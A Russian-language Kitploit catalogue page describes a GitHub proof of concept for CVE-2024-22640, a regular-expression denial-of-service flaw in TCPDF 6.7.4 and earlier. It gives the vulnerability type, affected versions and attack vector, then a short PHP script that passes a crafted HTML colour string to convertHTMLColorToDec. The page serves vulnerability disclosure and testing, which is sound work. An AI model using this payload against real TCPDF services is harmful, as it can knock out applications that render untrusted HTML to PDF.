Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-22640 — Эксплойт с доказательством концепции для CVE-2024-22640, ReDoS-уязвимости в TCPDF <=6.7.4, вызванной специально сформированным вводом цвета HTML, с демонстрационным кодом. | Kitploit
Инструменты/GitHubGitHub/zunak/cve-2024-22640
Статический анализАнализ уязвимостейАнализ КодаЭксплуатацияВеб-безопасностьФаззинг
GitHubzunak/cve-2024-22640

CVE-2024-22640

Эксплойт с доказательством концепции для CVE-2024-22640, ReDoS-уязвимости в TCPDF <=6.7.4, вызванной специально сформированным вводом цвета HTML, с демонстрационным кодом.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-22640

Тип уязвимости

Регулярное выражение, вызывающее отказ в обслуживании (ReDoS)

Затрагиваемый продукт и версия

TCPDF <= 6.7.4

Вектор атаки

TCPDF разбирает HTML-цвет, содержащий специально сформированную нагрузку.

Описание

Версия TCPDF <= 6.7.4 уязвима для ReDoS (отказ в обслуживании через регулярное выражение) при разборе недоверенной HTML-страницы со специально сформированным цветом.

PoC

root@kitploit:~
<?php

require_once('../tcpdf.php');

$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>

Примечание: Проверка с помощью preg_last_error() после уязвимой строки кода покажет, что регулярное выражение завершится с PREG_BACKTRACK_LIMIT_ERROR.

Скачать инструмент